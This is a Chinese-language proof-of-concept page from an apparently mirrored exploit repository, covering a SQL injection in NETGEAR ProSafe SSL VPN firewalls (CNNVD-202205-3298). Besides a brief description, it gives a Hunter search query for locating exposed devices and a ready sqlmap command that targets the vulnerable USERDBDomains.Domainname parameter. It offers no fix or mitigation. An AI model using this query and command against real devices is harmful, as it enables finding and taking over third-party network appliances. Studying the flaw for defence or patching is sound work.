admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-06-07 05:27:29 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/NETGEAR/NETGEARProSafeSSLVPNSQL注入(CNNVD-202205-3298).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.1 KiB
Raw Blame History

NETGEAR ProSafe SSL VPN SQL注入CNNVD-202205-3298

一、漏洞简介

NETGEAR FVS336G是美国网件NETGEAR公司的一款VPN虚拟私人网络防火墙路由器。NETGEAR ProSafe SSL VPN firmware FVS336Gv2 和FVS336Gv3版本存在安全漏洞该漏洞源于cgi-bin/platform.cgi中的USERDBDomains.Domainname参数缺少过滤转义。攻击者可利用该漏洞进行SQL注入攻击进而控制系统。

二、影响版本

  • NETGEAR ProSafe SSL VPN

三、资产测绘

  • hunterapp.name=="NETGEAR ProSAFE"
  • 特征

1694579919965-2ed9bd62-7659-4f42-b63c-fbce7679b1ce.png

四、漏洞复现

**sqlmap **

sqlmap -u "https://xx.xx.xx.xx/scgi-bin/platform.cgi" --form  -p USERDBDomains.Domainname --batch

1694588675748-169097da-b0a4-4bb1-ae8b-f68709d318ee.png

更新: 2024-02-29 23:57:14
原文: https://www.yuque.com/xiaokp7/ocvun2/mvw70mskzp0yhtyf